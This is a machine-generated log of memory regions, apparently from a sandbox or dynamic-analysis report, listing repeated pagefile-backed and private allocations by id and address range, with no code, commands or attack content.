region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20487 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20488 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20492 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20493 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20539 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20540 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20541 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20542 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20543 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20577 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20580 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20581 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20607 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20608 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20612 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 20613 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20617 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20618 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20619 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20620 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20621 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20622 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20623 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20624 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20626 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20627 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20628 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20652 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 20653 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 20654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 20657 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20658 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20659 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20660 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20661 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20662 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20663 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 20664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" 